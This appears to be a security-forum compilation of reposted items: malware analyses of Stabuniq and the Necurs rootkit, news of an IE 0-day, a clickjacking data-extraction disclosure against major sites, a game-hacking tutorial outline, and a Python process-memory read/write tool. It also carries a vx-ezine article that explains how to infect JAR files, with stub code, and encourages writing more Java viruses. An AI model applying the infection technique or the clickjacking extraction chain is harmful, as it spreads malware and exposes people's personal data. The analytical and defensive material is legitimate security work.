You gonna die like a bitch in the wolfs house. password: PortForwardings= -load muhaha -P Removal Instructions Removing this version of Stabuniq is quite easy: Start your task manager and kill any iexplore.exe process Open the windows registry, remove startup the entries mentioned above Reboot Remove the executable pointed by the startup strings in the registry Usually running an updated AV is a good option too… Just in case. Conclusions Stabuniq seems to be in a phase of information gathering, nevertheless it might become a real threat as soon as the author decides to change the behaviour of this trojan, if you have any update or just want to share something with us, please use the comment section below. Written by: Quequero & Evilcry Sursa: http://quequero.org/2013/01/stabuniq-financial-infostealer-trojan-analysis/

Necurs rootkit under microscope Okay, we already know about Necurs, just remind it interesting features: Highly difficult in terms of removal from infected system; Targeted to blocking drivers around 30 AV products [and 130 drivers in total]; Also targeted to x64 platform [has x64 version of driver]; Driver has obfuscated relocatable code; Provides for itself the earliest start in the system [before all AV or Anti-malware drivers and system drivers]; Has it's own PE-loader with features of module relocation and IAT tuning for creation a complete copy of working driver; Three types of black list: checking version info, special code signatures and drivers names. I already wrote about detection of this rootkit by various anti-rootkits here Security/malware blog: Necurs rootkit detection. In that post also listed symptoms of infection and various kernel anomalies. Today we'll talk about Necurs more detail. First of all - black list and how it's implemented. According to list, which is subject to examination by the rootkit, it includes about 30 various AV products (checking via version info), and 130 various drivers (checking via image names comparison). Full list of vendors avalaible here - Necurs targeted to prevent work products of these firms: Agnitum Ltd ALWIL S - Pastebin.com and list of drivers here - Necurs targeted to prevent work the following drivers: kprocesshacker.sys Vb - Pastebin.com. Before you start the static analysis you should retrieve decrypted version of driver. In normal encrypted state it looks like this: To be convinced that rootkit is active, you need to check presence of NtSecureSys device object. On the next step need to dump it decrypted body from memory with help of anti-rootkit or windbg. Ok, let's do it with windbg. Necurs sets some hooks to SSDT and this is one of the start point for dumping it image from memory. Next we can dump it from memory. Instead !pool command you can use search for MZ header in reverse order for retrieving start of decrypted copy: s 822bbe2b L-10000 'M' 'Z' Decrypted driver: Start point of black list checks - LoadImageNotifyRoutine function. Detailed info about this feature http://msdn.microsoft.com/en-us/library/windows/hardware/ff559957(v=vs.85).aspx. This callback is called every time when new driver [or user mode image] was loaded in system [or in process]. This function contains all types of blacklist checks. For example, on this screenshot below is represented check via vendors names in version info. If the driver is blacklisted, Necurs patches it entry point with two instructions, so DriverEntry after that returns STATUS_UNSUCCESSFULL and IO manager not load this driver. Rootkit also contains two special white lists of drivers that not included into black list. Collection of information into white list rootkit performs on stage of initialization. Rootkit performs scanning of \drivers directory and look for drivers not included into blacklist. Also it walks by services registry key and adds drivers into these lists. To avoid misunderstanding it adds loaders into these lists. Ways of drivers entry point modifications looks like: Necurs also blocks registry operations for own service key. So, any attempt to access to key fails. It possible with help of http://msdn.microsoft.com/ru-ru/library/windows/hardware/ff545879(v=vs.85).aspx Similar situation with file system. Necurs attaches his device object to volume and tracks all FS operation, so rootkit body on volume is unaccessible. Another interesting feature of Necurs - possibility of start before ALL drivers in the system [including boot bus extender drivers]. But on clean system we have another picture: Ok, all right. The conclusion is obvious: Necurs adds itself into "Boot Bus Extender" group and modifies priority ("Tag") of all drivers from this group (increases their Tag numbers by one, +1). Detailed about priority of drivers load, look CurrentControlSet\Services Subkey Entries Summary: Necurs also registers callback for tracking operations about handle creation for process with help of ObRegisterCallback. API - http://msdn.microsoft.com/en-us/library/windows/hardware/ff558692(v=vs.85).aspx From this callback rootkit performs modification of original final desired access for the handle in special cases of handle opening. Mission of NtOpenProcessHook consists in blocking open handle operation for process which rootkit considers as trusted. According to Microsoft Malware Protection Center (MMPC) Necurs found on more than 83,000 machines and Microsoft report calls rootkit a "prevalent threat". This is not surprising after disclosure of the threat, it becomes clear why this is so. Necurs Rootkit Spreading Quickly, Microsoft Warns - Dark Reading Unexpected reboot: Necurs - Microsoft Malware Protection Center - Site Home - TechNet Blogs Fingerprints: x32 version: SHA256: 742a3c8c0a3601af29daffb966e947334d4f20501e5568b9c9fbf4c3526b4b84 SHA1: 30f63b8cae41a97456a82131c4577a2020697b89 MD5: 0907292986e05a8752bc1863556d229e File size: 59776 bytes x64 version: SHA256: b3fea8183670ecf6150325f05aed28dfa27d7c6d2c1007808661f97c27fd7e1e SHA1: d69b06801a8378e8c9ac8b369cb9e14ef8c8d479 MD5: 39b447e293979ac7259d4d9a2711c9a0 File size: 75720 bytes Sursa: Security/malware blog: Necurs rootkit under microscope

Infecting JAR-Files using the JavaCompiler Class by R3s1stanc3 ########################################################## #### Infecting JAR-Files using the JavaCompiler Class #### ####################################### by R3s1stanc3 #### ########################################################## ######### # index # ######### 1. Intro 2. How JAR files work 3. The JavaCompiler class 4. How the infection works 5. Conclusion 6. References 1. Intro The last codes I wrote were mostly in Java and I have a few reasons for this: If you don't use very specific functions for Windows (e.g. trying to print a file) a code can be executed on every PC having Java installed no matter if it's Windows, Linux, Mac; 32-bits, 64-bits. The other reason is that I only know two other viruses (not speaking of exploits or drive-bys) written in Java out there: StrangeBrew (1998; CodeBreakers #4) [1] and Beanhive (1999; CodeBreakers #5) [2] both written by Landing Camel. These codes infected java classfiles by inserting their own bytecode in another classfile. So I was playing around with the JavaCompiler class [3], trying to write a polymorphic code and I wasn't able to get it running because you need to write the source code in a string and reassemble it every time containing its own code again and every time I got another error while compiling. Maybe I will get it running someday. But that gave me the idea of a new way to infect JAR files. 2. How JAR files work A JAR file (Java ARchive) is a simple zip file that includes the compiled class files and a folder called "META-INF" including the MANIFEST.MF that tells which class file is executed first. 3. The JavaCompiler class The JavaCompiler class is a Java class, that can compile Java sourcecode from a textfile or a string in runtime. It is even possible to run the compiled code in the memory without saving the compiled file on the disk. 4. How the infection works To find victim files, the code simply lists all files ending with ".jar" in the current directory in a string array and runs a foreach loop. When the virus is executed, it extacts itself in one temporary directory and the victim file in another directory. Then it reads the victim's main class from the manifesto. Example of an uninfected MANIFESTO.MF: Manifest-Version: 1.0 Class-Path: Main-Class: someClassName "someClassName" is read from the manifesto of the file we want to infect. That mainclass will be replaced by a new class "Infect.class" later, that is compiled by the virus. The code we compile in runtime: public class Infect { public static void main ( String args [ ] ) { javax . swing . JOptionPane . showMessageDialog ( null, \"Hi this is Java Infect0r\nand welcome to Valhalla #3!\" ) ; someClassName a = new someClassName ( ); a . main ( args ) CompileSourceInMemory b = new CompileSourceInMemory ( ) ; try { b . main ( args ) ; } catch ( Exception e ) { } } } // create a temporary class with the name of the main class to prevent errors while compiling class someClassName { public static void main ( String [ ] args ) { System . out . println ( ) ; } } This class executes the original mainclass ("someClassName"). After executing the original file, it executes the virus code to infect other files ("CompileSourceInMemory"). The second class is only used to prevent errors while compiling (the java compiler throws an error if a class is used but the file doesn't exist in the current directory). When the new file is compiled, the virus copies its own class files and the new compiled file in the temp folder of the host file, modifies the MANIFESTO.MF so that the Infect.class is executed first and zips the JAR file again. MANIFESTO.MF after being infected: Manifest-Version: 1.0 Class-Path: Main-Class: Infect To prevent a file from beeing infected twice, I add a text file with a specific name to the JAR archive and if this file exists, a file won't be infected. We need the JavaCompiler to compile the new class file (Infect.class), because every JAR file has another mainclass so we need to change the class ("someClassName" in this case) we want to execute every time. 5. Conclusion The JavaCompiler class is great to write viruses. I will try to get some polymorphic code running for the next ezine. A similar technique was used by AlcoPaul in polysharp/jabir [4] or Vitamin C [5] (both released in DarkCodez #3). He used the posibility to compile code on the fly in C# and used a changing encryption and varchanging for the polymorphism. In his project the sourcecode is stored in a string and gets rebuilt every time. So far from now and I hope I gave you some ideas and maybe we will see some more Java viruses soon. 6. References [1] StrangeBrew http://virus.wikidot.com/strangebrew [2] Beanhive http://virus.wikidot.com/beanhive [3] JavaCompiler http://docs.oracle.com/javase/6/docs/api/javax/tools/JavaCompiler.html [4] polysharp http://ezine.vxnetw0rk.ws/mag3/User/AlcoPaul/polycsharp.html [5] Vitamin C http://ezine.vxnetw0rk.ws/mag3/User/AlcoPaul/vitaminc.html R3s1stanc3 [vxnetw0rk] December, 2012 r3s1stanc3@tormail.org - r3s1stanc3.virii.lu Sursa: http://spth.virii.lu/v3/vessel/display/articles/R3s1stanc3/javainfector_article.txt

UI Redressing Mayhem: Identification Attacks and UI Redressing on Google Chrome Today I'm going to disclose a series of UI Redressing issues that could be exploited in order to extract information that may help an attacker to identify a victim-user whenever anonymity is a critical requirement. Moreover, a new extraction method, which has been successfully applied against Google Chrome, will be presented. Google's web browser disallows cross-origin drag&drop and what I'm introducing here is a completely different approach to achieve the extraction of potentially sensitive data. Identification Attacks I found that several world-renowned web applications lack protection of web resources from UI Redressing attacks, thus revealing data that can be abused to disclose a user's identity. An identification attack could be successfully performed by exploiting a UI Redressing flaw affecting web resources that include, for example, the name or the e-mail address of the victim. A series of vulnerabilities are presented below in order to exemplify some of these attacks. The first issue affects a Google's web application: an authenticated Google user can be attacked by abusing a UI Redressing vulnerability related to the support.google.com domain. As shown in Figure 1, no X-Frame-Options header is adopted, thus allowing the cross-domain extraction of personal data such as: Victim's e-mail address; Victim's first and last name; Victim's profile picture URL. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 1 - Google Support vulnerable to UI redressing attacks.[/TD] [/TR] [/TABLE] A Proof of Concept exploit can be downloaded here. The following is a video demonstrating the attack: Similar vulnerabilities have been found on other popular web applications. The following is a list of identified vulnerable web resources, exposing user's data: Microsoft Profile (First name, last name, e-mail address, etc - Figure 2) https://profile.live.com/home/Services/?view=manage&productid=connectedtoprofile [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 2 - Microsoft Profile web resource vulnerable to UI Redressing attacks.[/TD] [/TR] [/TABLE] Yahoo! (e-mail address, first name, birth date, sex, etc - Figure 3): http://profile.yahoo.com/y/edit/ [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 3 - Yahoo! web resource vulnerable to UI Redressing attacks.[/TD] [/TR] [/TABLE] Beyond the iframe-to-iframe extraction method The Google Chrome web browser seems to have defeated any extraction methods, denying the use of the view-source handler and disallowing cross-origin drag&drop. Despite these adverse conditions, I identified some attack scenarios where a UI Redressing issue could be still performed in order to extract sensitive data. Once again, the method is extremely simple. Instead of a cross-origin drag&drop, the victim is tricked to perform a same-origin action, where the dragged content belongs to a vulnerable web page of the targeted application and the "dropper" is a form (text area, input text field, etc.) located on the same domain. Using a site's functionality that allows publishing externally-facing content, it is still possible to extract information. Under these circumstances, Chrome will not reasonably deny the same-origin drag&drop, thus inducing the victim to involuntary publish sensitive data. As a matter of fact, the attacker is exploiting a subsequent clickjacking vulnerability on the same domain, which causes the publication of the personal information. I refer to this kind of attack chain as a "bridge" that allows the attacker to move sensitive data from being private to public, while remaining on the same domain. Then, the attacker can simply access the (now) public information to obtain the extracted data. It should be outlined that the technique requires two vulnerabilities: a web resources that is not protected by the X-Frame-Options (or uses a weak frame-busting code) and a site's functionality that is affected by clickjacking. The following list summarizes a series of functionalities that could be abused to extract the sensitive data: Forum's post mechanism; "comment this item" functionalities; Public profile information updating function (or any "update function" that involves public available data - e.g. administrative functions that cause the updating of the web site's content); Messaging functionalities (e.g. from the victim to the attacker); The proposed method has been successfully applied against Google Chrome version 23.0.1271.97, targeting the Amazon web application. Amazon exposes a series of web resources that include user's data - such as the name, e-mail address, mobile number and "address book" details - that are not protected with both X-Frame-Options header or any frame-busting mechanism. As an example, the following vulnerable URL includes Amazon's user first name, last name and e-mail address: https://www.amazon.com/gp/css/account/info/view.html?ie=UTF8&ref_=ya_20 A second issue on the comment function - our "bridge" - can be abused to publish the user's information as a comment for an Amazon item (e.g. a book), previously known by the attacker, and whose comments are "monitored". The following steps summarize the exploitation phases: The exploit frames both the vulnerable URL and the comment form of a attacker-chosen Amazon's book; The victim is triggered to drag his data and drop the information to the framed comment form; A clickjacking attack is then performed against the "Post" mechanism, in order to publish the dropped data; At that point the attacker can access all personal details by simply visualizing the submitted comment of the Amazon's item. The exploit code can be download here, while the following is a video of the described attack: Sursa: Nibble Security: UI Redressing Mayhem: Identification Attacks and UI Redressing on Google Chrome

[h=1]Exploited 0-day vulnerability in Internet Explorer discovered[/h] 02 January 2013 [h=2]At the very end of last year a new 0-day exploit against IE6, 7 and 8 was discovered in wild. Microsoft has released a temporary Fix-it pending a formal patch.[/h] The discovered attack appears to have been a water hole attack linked to the Elderwood project, using the Council on Foreign Relations (CFR) website. Water hole attacks first locate and compromise a site likely to be of interest to the intended targets, and then wait for those targets to come visiting. In this instance a 0-day vulnerability affecting Internet Explorer versions 6 to 8 was exploited to infect susceptible visitors. There is some suggestion that the targets include Chinese dissidents. Although the infected website is in New York, the exploit only triggers if the visiting browser is Chinese, Chinese (Taiwan), Japanese, Korean, or Russian. “The vulnerability present in Internet Explore 8 seems to be a user-after-free,” explains Jaime Blasco of AlienVault. “The exploit is able to exploit both Windows XP and Windows 7 bypassing both data execution (DEP) and address space layout randomization (ASLR) protections.” IE9 and 10 users are not vulnerable. If the exploit code is successful and a payload is implanted on the target, it attempts to connect to a C&C server that can download further malware. Although the discovered attack targeted a specific website, other users of the vulnerable IE versions should not ignore the threat. “There is now a Metasploit module (ie_cdwnbindinfo_uaf) that emulates this attack,” warns the Internet Storm Center, “meaning this will move in to mainstream exploitation rapidly, thus mitigation steps should be taken so soon as possible.” The best protection against exploits for this vulnerability, suggests Microsoft, is for the vulnerable code to not be present. Internet Explorer 9 or 10 do not include the vulnerable code. Where possible, then, the solution should be to upgrade to IE9 or IE10 as soon as possible. Where this is not possible – either through company policy or use of Windows XP which does not support IE9 or IE10 – users should apply the Microsoft Fix-it, or switch to a different browser. “If you are using IE9 or IE10, today is your lucky day, because you are not vulnerable to this. For those who are using older versions of IE such as 8 -- what's the matter with you?” comments sinn3r in the Rapid7 Metasploit blog. Microsoft has released a security advisory (2794220) with details of the vulnerability, and provided a Fix-it with details on how to implement it. Sursa: Infosecurity - Exploited 0-day vulnerability in Internet Explorer discovered

[h=1][C/C++] Reverse Engineering Tutorial for newbies[/h][h=3]Muted[/h] --------------------------------------------------------- ---===> Reverse Engineering Tutorial <===--- --==> For Beginners <==-- on Windows --------------------------------------------------------- -= SECTION 1 (Misc. information) =- I. WHAT THIS TUTORIAL WILL COVER II. PREFACE III. REQUIREMENTS IV. RECOMMENDATIONS -= SECTION 2 (WPM hack) =- I. WHAT TO HACK/HOW TO DO IT II. THE "GAME" III. THE MEMORY SEARCHER IV. TYING IT ALL TOGETHER (WPM) -= SECTION 3 (DLL hack) =- I. ADVANTAGES TO CODE INJECTION II. HOW TO CREATE A BASIC DLL III. DLL FILES -> MORE IN DEPTH IV. FINDING MEMORY ADDRESSES (OllyDbg) V. HOW 'JUMP PATCHING' WORKS VI. CALLING A FUNCTION FROM WITHIN APPENDIXES: A. How to create a DLL project (MSVC, Dev-C++, etc) B. TextControl header file C. Links to function prototypes used (MSDN site) D. WPM Hack (source code) E. DLL Hack (source code) F. DLL Injector (source code) - I take no credit for this G. The game (source code, "Hack me") ------------------------------------------------------------------------------------------------------------------- Section 1 WHAT THIS TUTORIAL WILL COVER: - General theory behind 'hacking' games - Usage of (C/C++) WriteProcessMemory function - Injection of code (patch jumping to a user-defined *.dll) PREFACE (skip if you want): This tutorial is aimed in a very general direction, towards helping people who have never really 'hacked' anything before, but want to try. Somebody who may, or may not have knowledge in the 'field' area, of hacking. If you've never hacked before, but used them, and used memory searchers before, this is for you to read! If you've created a few hacks before, but never tried to inject a *.dll before, or created a patch jump... This tutorial might be for you, but then again, you may already know, but never really have done it. REQUIREMENTS: - Knowledge of C or C++ (if you've only coded in C, know that "naked" is a C++ only keyword) - A compiler that is capable of inline, Intel syntax Assembly (MSVC is, but is not share/freeware) RECOMMENDATIONS: - Knowledge of basic Assembly (extremely helpful) - Knowledge of how to use a memory searcher (TSearch, ArtMoney, or another) - Knowledge of how to use a debugger (OllyDbg, SoftIce) - Knowledge of how computers function, in general (memory addresses, virtual memory addresses, etc) Tutorial: http://www.rohitab.com/discuss/topic/35537-cc-reverse-engineering-tutorial-for-newbies/

[h=1]process_memory_scanner.py[/h]By [h=3]cadaver[/h] # process_memory_scanner.py by Cadaver # this is written for Python 2.7 and tested on windows 7 64bit with 32bit processes. # it can scan an entire process for a integer value in under half a second. # it can also scan for any ctype within python ctypes or ctypes.wintypes modules \ # simply by creating an instance of the type and passing it as the target to the Scanner class. # license: public domain import gc from ctypes import * from time import time, sleep from ctypes.wintypes import * from threading import Thread from struct import calcsize, pack, unpack, Struct from win32gui import PyGetString, PySetString from win32process import GetProcessMemoryInfo from win32api import GetCurrentProcessId, GetCurrentProcess, CloseHandle from win32con import MEM_FREE, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION from win32con import PAGE_READWRITE, PAGE_WRITECOPY, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY from win32con import PAGE_EXECUTE_READ, PAGE_READONLY, PROCESS_VM_OPERATION, PROCESS_ALL_ACCESS DEBUG_QUERY = False # print VirtualQueryEx info. DEBUG_SLICE = False # print Python string slice detailed used for comparison. DEBUG_EXCEPTIONS = False # print some ignored exceptions that might occure. DEBUG_ALIGNMENT = False # print alignment info. DEBUG_COMPARE = False # print compare info ASSUME_ALIGNMENT = True # assume any non string type could be byte aligned. ACCESS = PROCESS_VM_READ | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION WRITABLE = PAGE_READWRITE | PAGE_WRITECOPY |PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY READABLE = PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_READONLY | PAGE_READWRITE MEMORY_STATES = {0x1000: "MEM_COMMIT", 0x10000: "MEM_FREE", 0x2000: "MEM_RESERVE"} MEMORY_PROTECTIONS = {0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGEEXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY", 0x01: "PAGE_NOACCESS", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY"} MEMORY_TYPES = {0x1000000: "MEM_IMAGE", 0x40000: "MEM_MAPPED", 0x20000: "MEM_PRIVATE"} # debug function to time an operation. def timeit (func): import time t1 = time.time () ret = func() print "Time taken:", time.time () - t1 return ret class MEMORY_BASIC_INFORMATION (Structure): _fields_ = [ ("BaseAddress", c_void_p), ("AllocationBase", c_void_p), ("AllocationProtect", DWORD), ("RegionSize", UINT), ("State", DWORD), ("Protect", DWORD), ("Type", DWORD) ] class PyMEMORY_BASIC_INFORMATION: def __init__ (self, MBI): self.MBI = MBI self.set_attributes () def set_attributes (self): self.BaseAddress = self.MBI.BaseAddress self.AllocationBase = self.MBI.AllocationBase self.AllocationProtect = MEMORY_PROTECTIONS.get (self.MBI.AllocationProtect, self.MBI.AllocationProtect) self.RegionSize = self.MBI.RegionSize self.State = MEMORY_STATES.get (self.MBI.State, self.MBI.State) #self.Protect = self.MBI.Protect # uncomment this and comment next line if you want to do a bitwise check on Protect. self.Protect = MEMORY_PROTECTIONS.get (self.MBI.Protect, self.MBI.Protect) self.Type = MEMORY_TYPES.get (self.MBI.Type, self.MBI.Type) class SYSTEM_INFO(Structure): _fields_ = [("wProcessorArchitecture", WORD), ("wReserved", WORD), ("dwPageSize", DWORD), ("lpMinimumApplicationAddress", DWORD), ("lpMaximumApplicationAddress", DWORD), ("dwActiveProcessorMask", DWORD), ("dwNumberOfProcessors", DWORD), ("dwProcessorType", DWORD), ("dwAllocationGranularity", DWORD), ("wProcessorLevel", WORD), ("wProcessorRevision", WORD)] class TARGET: """Given a ctype (initialized or not) this coordinates all the information needed to read, write and compare.""" def __init__ (self, ctype): self.alignment = 1 self.ctype = ctype # size of target data self.size = sizeof (ctype) self.type = ctype._type_ # get the format type needed for struct.unpack/pack. while hasattr (self.type, "_type_"): self.type = self.type._type_ # string_buffers and char arrays have _type_ 'c' # but that makes it slightly slower to unpack # so swap is for 's'. if self.type == "c": self.type = "s" # calculate byte alignment. this speeds up scanning substantially # because we can read and compare every alignment bytes # instead of every single byte. # although if we are scanning for a string the alignment is defaulted to 1 \ # (im not sure if this is correct). elif ASSUME_ALIGNMENT: # calc alignment divider = 1 for i in xrange (4): divider *= 2 if not self.size % divider: self.alignment = divider # size of target ctype. self.type_size = calcsize (self.type) # length of target / array length. self.length = self.size / self.type_size self.value = getattr (ctype, "raw", ctype.value) # the format string used for struct.pack/unpack. self.format = str (self.length) + self.type # efficient packer / unpacker for our own format. self.packer = Struct (self.format) def get_packed (self): """Gets the byte representation of the ctype value for use with WriteProcessMemory.""" return self.packer.pack (self.value) def __str__ (self): return str (self.ctype) [:10] + "..." + " <" + str (self.value)[:10]+ "..." + ">" class LOCK: """Locks a value to process memory by writing to it in a loop.""" def __init__ (self, process_handle, address, target, interval=0.001): self.process_handle = process_handle self.address = address self.target = target self.interval = interval self.lock_ = True def thread_lock (self): self.lock_ = True process_handle = self.process_handle address = self.address target = self.target interval = self.interval while self.lock_: write_target (process_handle, address, target) sleep (interval) def stop (self): self.lock_ = False def start (self): self.lock_ = True Thread (None, self.thread_lock).start () def __del__ (self): self.stop () def OpenProcess (pid=GetCurrentProcessId()): phandle = windll.kernel32.OpenProcess (\ ACCESS, #PROCESS_ALL_ACCESS, # alternative access right for debugging. False, pid ) assert phandle, "Failed to open process!\n%s" % WinError (GetLastError ()) [1] return phandle def VirtualQueryEx (process_handle, address): MBI = MEMORY_BASIC_INFORMATION () MBI_pointer = byref (MBI) size = sizeof (MBI) success = windll.kernel32.VirtualQueryEx ( process_handle, address, MBI_pointer, size ) assert success, "VirtualQueryEx Failed with success == %s.\n%s" % (success, WinError (GetLastError ()) [1]) assert success == size, "VirtualQueryEx Failed because not all data was written." return PyMEMORY_BASIC_INFORMATION (MBI) def VirtualProtectEx (process_handle, address, size, new_protection): old_protection = DWORD () old_protection_pointer = byref (old_protection) success = windll.kernel32.VirtualProtectEx ( process_handle, address, size, new_protection, old_protection_pointer ) assert success, "VirtualProtectEx Failed with success == %s.\n%s" % (success, WinError (GetLastError ()) [1]) return old_protection.value def ReadMemory (process_handle, address, size): cbuffer = c_buffer (size) success = windll.kernel32.ReadProcessMemory ( process_handle, address, cbuffer, size, 0 ) assert success, "ReadMemory Failed with success == %s and address == %s and size == %s.\n%s" % (success, address, size, WinError (GetLastError()) [1]) return cbuffer.raw def WriteMemory (process_handle, address, data): """Writes string data to process and returns success.""" size = len (data) success = windll.kernel32.WriteProcessMemory (\ process_handle, address, data, size, 0 ) assert success, "Failed to write process memory!\n%s" % WinError (GetLastError()) [1] return success def write_target (process_handle, address, target): # target can be a ctype initialized with value. """Writes TARGET instance to address.""" if not isinstance (target, TARGET): target = TARGET (target) return WriteMemory (process_handle, address, target.get_packed()) def read_target (process_handle, address, target): # target can be a ctype initialized with value. """Reads TARGET instance from address and returns the unpacked python equivalent.""" if not isinstance (target, TARGET): target = TARGET (target) bytes_ = ReadMemory (process_handle, address, target.size) return target.packer.unpack (bytes_) [0] def scan_page (process_handle, page_address, target): # target must be TARGET instance. eg TARGET (c_int (123)). """Scans the entire page for TARGET instance and returns the next page address and found addresses.""" information = VirtualQueryEx (process_handle, page_address) base_address = information.BaseAddress region_size = information.RegionSize next_region = base_address + region_size size = target.size format_ = target.format target_value = target.value step = target.alignment unpacker = target.packer.unpack found = [] # Filter out any pages that are not readable by returning the next_region address # and an empty list to represent no addresses found. if information.Type != "MEM_PRIVATE" or \ region_size < size or \ information.State != "MEM_COMMIT" or \ information.Protect not in ["PAGE_EXECUTE_READ", "PAGEEXECUTE_READWRITE", "PAGE_READWRITE"]: return next_region, [] if DEBUG_QUERY: print vars (information) # read the whole page into buffer. page_bytes = ReadMemory (process_handle, base_address, region_size) # iterate over the page buffer bytes in steps of alignment # and unpack those bytes into the format described by # TARGET instance, then compare with TARGET. for i in xrange (0, (region_size - size), step): partial = page_bytes [i:i + size] if unpacker (partial) [0] == target_value: found.append (base_address + i) if DEBUG_SLICE: print "Found at address: %s i: %s Partial: %s Len_Partial: %s Alignment: %s." \ % (base_address+i, i, partial, len(partial), step) if DEBUG_COMPARE: print "Unpacked: %s Partial: %s" % (repr(unpacker (partial)[0]), repr(target_value)) del page_bytes # free the buffer return next_region, found def scan_addresses (process_handle, addresses, target): """Scans addresses and returns a dictionary of {address: value}.""" values = {} for address in addresses: try: value = read_target (process_handle, address, target) except Exception, error: # the process may of freed the page while we are scanning. if DEBUG_EXCEPTIONS: raise continue values [address] = value return values def scan_addresses_for_target (process_handle, addresses, target): """Scan addresses and returns a list of those addresses that match the target value.""" target_value = target.value found = list () values = scan_addresses (process_handle, addresses, target) for address, value in values.items (): if value == target_value: found.append (address) return found def scan_addresses_for_change (process_handle, addresses, target): """scan addresses and returns a list of those addresses that don't match the target value.""" target_value = target.value found = list () values = scan_addresses (process_handle, addresses, target) for address, value in values.items (): if value != target_value: found.append (address) return found def scan_process (process_handle, target): """scans a processes pages for the target value.""" if not isinstance (target, TARGET): target = TARGET (target) if DEBUG_ALIGNMENT: print "Target: %s Size: %s Alignment: %s." % (target.ctype, target.size, target.alignment) si = SYSTEM_INFO () psi = byref (si) windll.kernel32.GetSystemInfo (psi) # get the first address of the first page to scan so we know where to start scanning base_address = si.lpMinimumApplicationAddress # get the last address to scan so we know when to stop scanning. max_address = si.lpMaximumApplicationAddress found = list () page_address = base_address while page_address < max_address: next_page, f = scan_page (process_handle, page_address, target) found.extend (f) page_address = next_page if len (found) >= 60000000: print "[Warning] Scan ended early because too many addresses were found to hold the target data." break gc.collect () return found class Scanner: def __init__ (self, pid, ctype=None): self.pid = pid self.process_handle = OpenProcess (pid) self.target = None self.found = list () self.locks = list () if ctype: self.set_target (ctype) def set_target (self, ctype): self.target = TARGET (ctype) def scan_process(self): self.found = scan_process (self.process_handle, self.target) print len (self.found), "Addresses with value %s found." % (self.target) def scan_for_change (self): self.found = scan_addresses_for_change (self.process_handle, self.found, self.target) print len (self.found), "Addresses with NOT value %s found." % (self.target) def scan_for_new_target (self, ctype): target = TARGET (ctype) self.found = scan_addresses_for_target (self.process_handle, self.found, target) print len (self.found), "Addresses with new value %s found." % (self.target) def scan_addresses (self, addresses=None): if not addresses: addresses = self.found return scan_addresses (self.process_handle, addresses, self.target) def write_target (self, address, target): return write_target (self.process_handle, address, target) def read_target (self, address, target): return read_target (self.process_handle, address, target) def lock_target (self, address, target): if not isinstance (target, TARGET): target = TARGET (target) lock = LOCK (self.process_handle, address, target) lock.start () self.locks.append (lock) def stop_locks (self): for lock in self.locks: lock.stop () self.locks = list () def __del__ (self): del self.found if self.process_handle: CloseHandle (self.process_handle) def test (): global PID, p, s, a, na PID = GetCurrentProcessId () #p = OpenProcess () s = Scanner (PID, create_string_buffer ("teststringthing")) # s = Scanner (PID, c_int (123)) print "Scanning process." timeit (s.scan_process) a = s.found [0] print "Locking found[0]." s.lock_target (a, create_string_buffer ("new str")) print "Writing target." s.write_target (a, create_string_buffer ("new str 2")) print "Scanning for changes." s.scan_for_change () print "Scanning for new target." s.scan_for_new_target (c_int (1)) print "Scanning addresses." s.found = [a] na=s.scan_addresses () print "Reading target." r = s.read_target (a, c_int) print "Writing target." s.write_target (a, create_string_buffer ("test")) s.write_target (a, c_double (88.8)) s.write_target (a, c_int (123)) s.write_target (a, c_float (1.2)) s.stop_locks () Scanner.__doc__ = """ class Scanner: This is the main scanner class that attempts to provide a tidy API for scanning a remote process for values. def __init__ (self, pid, ctype=None): This is the initializer that takes the process iD and any ctype from the ctype module or wintype from the wintype module as the type and value we want to scan for eg c_int (1) - if we want to search for a integer of value 1, or create_string_buffer ("test") - if we want to search for a string of value 'test'. def set_target (self, ctype): Sets the ctype (with value) of the data we want to search for. def scan_process(self): Scans the process for target and saves the found addresses in self.found. def scan_for_change (self): Scans the addresses in self.found for any value that isnt the target value and saves these new addresses in self.found. def scan_for_new_target (self, ctype): Scans the addresses in self.found for a new value and returns the ones that match. def scan_addresses (self, addresses=None): Scans the addresses and returns a dictionary of {address, value}. def write_target (self, address, target): Writes the data described by target to the address. def read_target (self, address, target): Reads the data described by target from address. def lock_target (self, address, target): Locks address to target value. def stop_locks (self): Terminates all current locks. """ if __name__ == "__main__": print Scanner.__doc__ raw_input ("[paused]") This is written in Python 2.7 and requires Pythons win32 extensions. Sursa: process_memory_scanner.py - rohitab.com - Forums

Crypto And The Cops: The Law Of Key Disclosure And Forced Decryption Description: Can the government force you to turn over your encryption passphrase or decrypt your data? The law surrounding police attempts to force decryption is developing at breakneck speed, with two major court decisions this year alone. This talk will start off with an in-depth explanation of the Fifth Amendment privilege against self-incrimination, its origins, and how it applies to government attempts to force disclosure of keys or decrypted versions of data in the United States. We'll also discuss law enforcement authority to demand passphrases and decryption of data stored with third parties, and survey key disclosure laws in other countries. Marcia Hofmann is a senior staff attorney at the Electronic Frontier Foundation, where she works on a broad range of digital civil liberties issues including computer security, electronic privacy, and free expression. She currently focuses on computer crime and EFF's Coders' Rights Project, which promotes innovation and protects the rights of curious tinkerers and researchers in their cutting-edge exploration of technology. Prior to joining EFF, Marcia was staff counsel and director of the Open Government Project at the Electronic Privacy Information Center (EPIC). Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Crypto And The Cops: The Law Of Key Disclosure And Forced Decryption

